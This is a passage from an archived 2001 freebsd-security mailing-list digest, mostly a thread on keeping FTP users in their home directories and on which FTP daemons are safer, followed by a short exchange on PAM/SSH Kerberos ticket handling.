charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No, they can go into other people's directories by default. The default umask on FreeBSD is 022, which means that all users files (with certain exceptions like .rhosts and others) are 644 and directories are 755. Both of which are world readable. I typically change the umask for my account to 027, that way others in the wheel group can see files I create, but others cannot. For more information on the way modes work, you should read the chmod and umask man pages. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 2 Feb 2001, Benjamin Ossei wrote: > By default every user has rights to their own home directory. Unless the server isn't set correctly. Also if they happen to browse, they shouldn't be able to go into anyone elses directory. > > --- Rob Simmons > > wrote: > >???? The server is what governs where the user can browse. Read the man > >page for ftpd, you will find that the /etc/ftpchroot controls what users > >are restricted to thier home directory. > > > >Robert Simmons > >Systems Administrator > >http://www.wlcg.com/ > > > >On Fri, 2 Feb 2001, jeff wrote: > > > >> Im looking for a ftp client that will keep the user in there home dir a lot of the new ftp software is letting users browse the server's other dirs any scripts I can use that would handel this issuse > >> > >> Jeff Gray cfm > >> > >> > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > _____________________________________________________________ > ========GET YOUR FREE E-MAIL============ > http://freemail.cahostnet.net > Web Hosting http://www.cahostnet.com > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:13:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 1E2AB37B491 for ; Fri, 2 Feb 2001 12:13:06 -0800 (PST) Received: from Laptop (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with ESMTP id f12KCoW29180; Fri, 2 Feb 2001 15:12:51 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "Rob Simmons" , "Benjamin Ossei" Cc: "jeff" , Subject: RE: ftp Date: Fri, 2 Feb 2001 15:11:48 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Another way is to use wu-ftpd, and "man ftpaccess" :-----Original Message----- :From: owner-freebsd-security@FreeBSD.ORG :[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Rob Simmons :Sent: February 2, 2001 15:03 PM :To: Benjamin Ossei :Cc: jeff; security@FreeBSD.ORG :Subject: Re: ftp : : :No, they can go into other people's directories by default. The default :umask on FreeBSD is 022, which means that all users files :(with certain exceptions like .rhosts and others) are 644 and directories :are 755. Both of which are world readable. I typically change the umask :for my account to 027, that way others in the wheel group can see files I :create, but others cannot. : :For more information on the way modes work, you should read the chmod and :umask man pages. : :Robert Simmons :Systems Administrator :http://www.wlcg.com/ : :On Fri, 2 Feb 2001, Benjamin Ossei wrote: : :> By default every user has rights to their own home directory. :Unless the server isn't set correctly. Also if they happen to :browse, they shouldn't be able to go into anyone elses directory. :> :> --- Rob Simmons :> > wrote: :> >???? The server is what governs where the user can browse. :Read the man :> >page for ftpd, you will find that the /etc/ftpchroot controls what users :> >are restricted to thier home directory. :> > :> >Robert Simmons :> >Systems Administrator :> >http://www.wlcg.com/ :> > :> >On Fri, 2 Feb 2001, jeff wrote: :> > :> >> Im looking for a ftp client that will keep the user in there :home dir a lot of the new ftp software is letting users browse the :server's other dirs any scripts I can use that would handel this issuse :> >> :> >> Jeff Gray cfm :> >> :> >> :> > :> > :> > :> >To Unsubscribe: send mail to majordomo@FreeBSD.org :> >with "unsubscribe freebsd-security" in the body of the message :> :> _____________________________________________________________ :> ========GET YOUR FREE E-MAIL============ :> http://freemail.cahostnet.net :> Web Hosting http://www.cahostnet.com :> : : : :To Unsubscribe: send mail to majordomo@FreeBSD.org :with "unsubscribe freebsd-security" in the body of the message : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:16:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.ca (unknown [209.47.215.67]) by hub.freebsd.org (Postfix) with SMTP id 0BF0C37B4EC for ; Fri, 2 Feb 2001 12:16:18 -0800 (PST) Received: (qmail 2596 invoked by uid 1000); 2 Feb 2001 20:16:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Feb 2001 20:16:16 -0000 Date: Fri, 2 Feb 2001 15:16:13 -0500 (EST) From: Matt Heckaman To: Will Mitayai Keeso Rowe Cc: Rob Simmons , Subject: RE: ftp In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: : Another way is to use wu-ftpd, and "man ftpaccess" Otherwise known as root-exploits-R-us :) * Matt Heckaman - mailto:matt@lucida.ca http://www.lucida.ca/pgp * * GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.ca/pgp iD8DBQE6exWQMXHAk0rTE2QRAir2AJ4mrAh4q44nAA8mLymQwedSmXk00QCdFmj6 p9k23G5pxiXQK8CFWA5trzI= =i5Gr -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:22:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 387B437B401 for ; Fri, 2 Feb 2001 12:22:35 -0800 (PST) Received: from Laptop (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with ESMTP id f12KMXW32034; Fri, 2 Feb 2001 15:22:33 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "Matt Heckaman" Cc: "Rob Simmons" , Subject: RE: ftp Date: Fri, 2 Feb 2001 15:21:30 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unfair. all known bugs have been fixed. :-----Original Message----- :From: Matt Heckaman [mailto:matt@LUCIDA.CA] :Sent: February 2, 2001 15:16 PM :To: Will Mitayai Keeso Rowe :Cc: Rob Simmons; security@FreeBSD.ORG :Subject: RE: ftp : : :-----BEGIN PGP SIGNED MESSAGE----- :Hash: SHA1 : :On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: : :: Another way is to use wu-ftpd, and "man ftpaccess" : :Otherwise known as root-exploits-R-us :) : :* Matt Heckaman - mailto:matt@lucida.ca http://www.lucida.ca/pgp * :* GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 * : :-----BEGIN PGP SIGNATURE----- :Version: GnuPG v1.0.4 (FreeBSD) :Comment: http://www.lucida.ca/pgp : :iD8DBQE6exWQMXHAk0rTE2QRAir2AJ4mrAh4q44nAA8mLymQwedSmXk00QCdFmj6 :p9k23G5pxiXQK8CFWA5trzI= :=i5Gr :-----END PGP SIGNATURE----- : : : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:23: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 9633A37B491 for ; Fri, 2 Feb 2001 12:22:45 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f12KMuP43138; Fri, 2 Feb 2001 15:22:56 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Fri, 2 Feb 2001 15:22:56 -0500 (EST) From: Rob Simmons To: Will Mitayai Keeso Rowe Cc: Benjamin Ossei , jeff , security@FreeBSD.ORG Subject: RE: ftp In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I wouldn't use wu-ftp if I were you. It has a history of nasty remote exploits. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: > Another way is to use wu-ftpd, and "man ftpaccess" > > > :-----Original Message----- > :From: owner-freebsd-security@FreeBSD.ORG > :[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Rob Simmons > :Sent: February 2, 2001 15:03 PM > :To: Benjamin Ossei > :Cc: jeff; security@FreeBSD.ORG > :Subject: Re: ftp > : > : > :No, they can go into other people's directories by default. The default > :umask on FreeBSD is 022, which means that all users files > :(with certain exceptions like .rhosts and others) are 644 and directories > :are 755. Both of which are world readable. I typically change the umask > :for my account to 027, that way others in the wheel group can see files I > :create, but others cannot. > : > :For more information on the way modes work, you should read the chmod and > :umask man pages. > : > :Robert Simmons > :Systems Administrator > :http://www.wlcg.com/ > : > :On Fri, 2 Feb 2001, Benjamin Ossei wrote: > : > :> By default every user has rights to their own home directory. > :Unless the server isn't set correctly. Also if they happen to > :browse, they shouldn't be able to go into anyone elses directory. > :> > :> --- Rob Simmons > :> > wrote: > :> >???? The server is what governs where the user can browse. > :Read the man > :> >page for ftpd, you will find that the /etc/ftpchroot controls what users > :> >are restricted to thier home directory. > :> > > :> >Robert Simmons > :> >Systems Administrator > :> >http://www.wlcg.com/ > :> > > :> >On Fri, 2 Feb 2001, jeff wrote: > :> > > :> >> Im looking for a ftp client that will keep the user in there > :home dir a lot of the new ftp software is letting users browse the > :server's other dirs any scripts I can use that would handel this issuse > :> >> > :> >> Jeff Gray cfm > :> >> > :> >> > :> > > :> > > :> > > :> >To Unsubscribe: send mail to majordomo@FreeBSD.org > :> >with "unsubscribe freebsd-security" in the body of the message > :> > :> _____________________________________________________________ > :> ========GET YOUR FREE E-MAIL============ > :> http://freemail.cahostnet.net > :> Web Hosting http://www.cahostnet.com > :> > : > : > : > :To Unsubscribe: send mail to majordomo@FreeBSD.org > :with "unsubscribe freebsd-security" in the body of the message > : > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:24: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 8C67D37B684 for ; Fri, 2 Feb 2001 12:23:47 -0800 (PST) Received: from Laptop (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with ESMTP id f12KNjW32055; Fri, 2 Feb 2001 15:23:45 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "Matt Heckaman" Cc: "Rob Simmons" , Subject: RE: ftp Date: Fri, 2 Feb 2001 15:22:42 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org besides, i notice you're using Pine ;-P :-----Original Message----- :From: Matt Heckaman [mailto:matt@LUCIDA.CA] :Sent: February 2, 2001 15:16 PM :To: Will Mitayai Keeso Rowe :Cc: Rob Simmons; security@FreeBSD.ORG :Subject: RE: ftp :Importance: High : : :-----BEGIN PGP SIGNED MESSAGE----- :Hash: SHA1 : :On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: : :: Another way is to use wu-ftpd, and "man ftpaccess" : :Otherwise known as root-exploits-R-us :) : :* Matt Heckaman - mailto:matt@lucida.ca http://www.lucida.ca/pgp * :* GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 * : :-----BEGIN PGP SIGNATURE----- :Version: GnuPG v1.0.4 (FreeBSD) :Comment: http://www.lucida.ca/pgp : :iD8DBQE6exWQMXHAk0rTE2QRAir2AJ4mrAh4q44nAA8mLymQwedSmXk00QCdFmj6 :p9k23G5pxiXQK8CFWA5trzI= :=i5Gr :-----END PGP SIGNATURE----- : : : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:24:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id A101837B4EC for ; Fri, 2 Feb 2001 12:24:38 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f12KPLP43292; Fri, 2 Feb 2001 15:25:21 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Fri, 2 Feb 2001 15:25:21 -0500 (EST) From: Rob Simmons To: Will Mitayai Keeso Rowe Cc: Matt Heckaman , security@FreeBSD.ORG Subject: RE: ftp In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org They said that about bind........... And sendmail........................ Unless there is a specific feature that you are looking to use proftpd or wu-ftpd for, then there is no reason to use them. The native freebsd ftpd is quite good, and simple. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: > unfair. > all known bugs have been fixed. > > > :-----Original Message----- > :From: Matt Heckaman [mailto:matt@LUCIDA.CA] > :Sent: February 2, 2001 15:16 PM > :To: Will Mitayai Keeso Rowe > :Cc: Rob Simmons; security@FreeBSD.ORG > :Subject: RE: ftp > : > : > :-----BEGIN PGP SIGNED MESSAGE----- > :Hash: SHA1 > : > :On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: > : > :: Another way is to use wu-ftpd, and "man ftpaccess" > : > :Otherwise known as root-exploits-R-us :) > : > :* Matt Heckaman - mailto:matt@lucida.ca http://www.lucida.ca/pgp * > :* GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 * > : > :-----BEGIN PGP SIGNATURE----- > :Version: GnuPG v1.0.4 (FreeBSD) > :Comment: http://www.lucida.ca/pgp > : > :iD8DBQE6exWQMXHAk0rTE2QRAir2AJ4mrAh4q44nAA8mLymQwedSmXk00QCdFmj6 > :p9k23G5pxiXQK8CFWA5trzI= > :=i5Gr > :-----END PGP SIGNATURE----- > : > : > : > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:28:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 618E037B401 for ; Fri, 2 Feb 2001 12:28:32 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f12KTFv43570; Fri, 2 Feb 2001 15:29:15 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Fri, 2 Feb 2001 15:29:14 -0500 (EST) From: Rob Simmons To: Will Mitayai Keeso Rowe Cc: Matt Heckaman , security@FreeBSD.ORG Subject: RE: ftp In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org local services like pine are different than daemons that listen on ports and can have potential remote exploits. >;-D Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: > besides, i notice you're using Pine ;-P > > :-----Original Message----- > :From: Matt Heckaman [mailto:matt@LUCIDA.CA] > :Sent: February 2, 2001 15:16 PM > :To: Will Mitayai Keeso Rowe > :Cc: Rob Simmons; security@FreeBSD.ORG > :Subject: RE: ftp > :Importance: High > : > : > :-----BEGIN PGP SIGNED MESSAGE----- > :Hash: SHA1 > : > :On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: > : > :: Another way is to use wu-ftpd, and "man ftpaccess" > : > :Otherwise known as root-exploits-R-us :) > : > :* Matt Heckaman - mailto:matt@lucida.ca http://www.lucida.ca/pgp * > :* GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 * > : > :-----BEGIN PGP SIGNATURE----- > :Version: GnuPG v1.0.4 (FreeBSD) > :Comment: http://www.lucida.ca/pgp > : > :iD8DBQE6exWQMXHAk0rTE2QRAir2AJ4mrAh4q44nAA8mLymQwedSmXk00QCdFmj6 > :p9k23G5pxiXQK8CFWA5trzI= > :=i5Gr > :-----END PGP SIGNATURE----- > : > : > : > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:31:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.ca (unknown [209.47.215.67]) by hub.freebsd.org (Postfix) with SMTP id D3C4537B491 for ; Fri, 2 Feb 2001 12:31:34 -0800 (PST) Received: (qmail 2710 invoked by uid 1000); 2 Feb 2001 20:31:33 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Feb 2001 20:31:33 -0000 Date: Fri, 2 Feb 2001 15:31:32 -0500 (EST) From: Matt Heckaman To: Will Mitayai Keeso Rowe Cc: Rob Simmons , Subject: RE: ftp In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 2 Feb 2001, Will Mitayai Keeso Rowe wrote: : besides, i notice you're using Pine ;-P Yep, on a user account that has nothing of value, not running as root. You're totally right though, pine is an absolute and total mess, I really should devote some time into using a real mailer like mutt. :) I apologize though, you're right about the wuftpd comment being unfair. Sometimes I neglect to think before hitting send. I guess I never liked wu-ftpd even without the prior bugs, I find proftpd's apache-ish config style much better for my situation. It hasn't had a flawless record either though. I guess the only safe way to go is the freebsd ftpd, but it just isn't as flexible as proftpd is. :( On the other hand, I also run bind, albeit in a chroot as a non root user, sometimes ease of use wins out at times, I can't even begin to think how I would handle a migration to something like dbjdns, though I'm hopefull that bind 9 will be much better in a few point releases. :) * Matt Heckaman - mailto:matt@lucida.ca http://www.lucida.ca/pgp * * GPG fingerprint - 53CA 8320 C8F6 32ED 9DDF 036E 3171 C093 4AD3 1364 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: http://www.lucida.ca/pgp iD8DBQE6exklMXHAk0rTE2QRAg1OAJ9lnRR5Ea9hqwcVEpCMrqv0ZXTG8wCgpMMZ 4eJCZLIXG0Q0Yl+pHCPjkTc= =RPfO -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 12:50:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id F3F1937B67D for ; Fri, 2 Feb 2001 12:49:58 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id PAA90372; Fri, 2 Feb 2001 15:49:44 -0500 (EST) (envelope-from wollman) Date: Fri, 2 Feb 2001 15:49:44 -0500 (EST) From: Garrett Wollman Message-Id: <200102022049.PAA90372@khavrinen.lcs.mit.edu> To: Rob Simmons Cc: security@FreeBSD.ORG Subject: RE: ftp In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I wouldn't use wu-ftp if I were you. It has a history of nasty remote > exploits. So does UNIX, by that score. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 13:25:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id DC5C937B401 for ; Fri, 2 Feb 2001 13:24:55 -0800 (PST) Received: (qmail 5257 invoked by uid 1000); 2 Feb 2001 21:24:55 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Feb 2001 21:24:55 -0000 Date: Fri, 2 Feb 2001 15:24:55 -0600 (CST) From: Mike Silbersack To: Rob Simmons Cc: Will Mitayai Keeso Rowe , Matt Heckaman , Subject: RE: ftp In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 2 Feb 2001, Rob Simmons wrote: > local services like pine are different than daemons that listen on ports > and can have potential remote exploits. >;-D > > Robert Simmons > Systems Administrator > http://www.wlcg.com/ Well... you're running 4.21, which has a known exploit. You should at least upgrade to the current version. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 15:48:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from hosting.proc.ru (unknown [212.16.1.117]) by hub.freebsd.org (Postfix) with SMTP id C69FE37B491 for ; Fri, 2 Feb 2001 15:48:10 -0800 (PST) Received: (qmail 93627 invoked from network); 3 Feb 2001 00:05:19 -0000 Received: from unknown (HELO HELLMAN) (212.16.6.218) by hostmaster.procenter.net.ru with SMTP; 3 Feb 2001 00:05:19 -0000 Date: Sat, 3 Feb 2001 02:50:31 +0300 From: hellman X-Mailer: The Bat! (v1.47 Halloween Edition) Personal Reply-To: hellman X-Priority: 3 (Normal) Message-ID: <13928090054.20010203025031@artofit.com> To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe freebsd-security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 15:53: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 84C6437B491 for ; Fri, 2 Feb 2001 15:52:38 -0800 (PST) Received: (qmail 64585 invoked by uid 1000); 2 Feb 2001 23:50:22 -0000 Date: Sat, 3 Feb 2001 01:50:21 +0200 From: Peter Pentchev To: hellman Cc: freebsd-security@freebsd.org Subject: Re: your mail Message-ID: <20010203015020.E53956@ringworld.oblivion.bg> Mail-Followup-To: hellman , freebsd-security@freebsd.org References: <13928090054.20010203025031@artofit.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <13928090054.20010203025031@artofit.com>; from sec@artofit.com on Sat, Feb 03, 2001 at 02:50:31AM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Feb 03, 2001 at 02:50:31AM +0300, hellman wrote: > subscribe freebsd-security This might work better if you send it to majordomo@FreeBSD.org, not to the list itself. G'luck, Peter -- This sentence contradicts itself - or rather - well, no, actually it doesn't! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 15:54: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id D9A6C37B4EC for ; Fri, 2 Feb 2001 15:53:35 -0800 (PST) Received: (qmail 65888 invoked by uid 1000); 2 Feb 2001 23:51:48 -0000 Date: Sat, 3 Feb 2001 01:51:47 +0200 From: Peter Pentchev To: freebsd-security@freebsd.org Subject: Re: your mail Message-ID: <20010203015146.F53956@ringworld.oblivion.bg> Mail-Followup-To: freebsd-security@freebsd.org References: <13928090054.20010203025031@artofit.com> <20010203015020.E53956@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010203015020.E53956@ringworld.oblivion.bg>; from roam@orbitel.bg on Sat, Feb 03, 2001 at 01:50:21AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Feb 03, 2001 at 01:50:21AM +0200, Peter Pentchev wrote: > On Sat, Feb 03, 2001 at 02:50:31AM +0300, hellman wrote: > > subscribe freebsd-security > > This might work better if you send it to majordomo@FreeBSD.org, > not to the list itself. *sigh* sorry, list; wrong reply key. G'luck, Peter -- If the meanings of 'true' and 'false' were switched, then this sentence wouldn't be false. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 18:15: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 03DE837B491; Fri, 2 Feb 2001 18:14:40 -0800 (PST) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.1/8.11.1) with SMTP id f132Ech37849; Fri, 2 Feb 2001 21:14:39 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Fri, 2 Feb 2001 21:14:38 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: "Brian F. Feldman" Cc: security@FreeBSD.org, assar@FreeBSD.org Subject: Re: PAM/SSH and KerberosIV? In-Reply-To: <200101310049.f0V0n1f15852@green.dyndns.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jan 2001, Brian F. Feldman wrote: > I don't know. I do not have the capacity to test Kerberos without going > through the trouble of setting it up for only myself only on my own > computer, which would be an exercise in utterly profound useless effort. > So, anyone who does it, let me know if it works for you and how. If you need to test your code in an existing kerberos realm, remember that both FreeBSD.org and watson.org use kerberos, and it would be easy to arrange for a principal for one of your hosts. I ran through the tests, and the following occurs: without the pam_kerberosIV.so entry in /etc/pam.conf, you cannot log in using kerberos. I've committed a commented out pam_kerberosIV.so entry for sshd to match the others in pam.conf in -CURRENT. I'll MFC to -STABLE sometime soon if there are no complaints. This appears to remedy the failure of Kerberos passwords to work, which is not unexpected :-). However, this seems to have broken using unique kerberos ticket filenames for each session -- now it always uses /tmp/tkt1000 for uid 1000, rather than /tmp/tkt1000_randomnumber, meaning that if you log in twice, the first logout hoses the tickets for the second session. This didn't happen previously, and is probably an issue with pam_kerberosIV.so that I didn't run into previously since I always logged in via SSH. It's probably not a security hole as presumably KTH does the right thing with regards to O_EXCL and so on, but it's not ideal. > BTW, you ever test the make-ssh-use-/dev/tty-to-ask-for-OTP patch? Nope, need to do that. I'll apply it on my local tree tonight and hopefully get a chance to test it this weekend or Monday. BTW, at one point I think you committed some fixes relating to SSH sessions crashing (I think it was the tunnel closing bug?); were those from the base OpenSSH tree, or should we be submitting them back to the openssh-unix-dev mailing list? Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Feb 2 19: 9:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from nexus6.polaris.ca (nexus6.polaris.ca [199.247.156.222]) by hub.freebsd.org (Postfix) with SMTP id 4263737B401 for ; Fri, 2 Feb 2001 19:09:41 -0800 (PST) Received: (qmail 733 invoked by uid 0); 3 Feb 2001 03:09:39 -0000 Received: from tornado.northwestel.net (HELO tornado) (199.85.229.209) by nexus6.polaris.ca with SMTP; 3 Feb 2001 03:09:39 -0000 From: "Seamus.Venasse" To: Subject: Date: Fri, 2 Feb 2001 19:09:02 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: 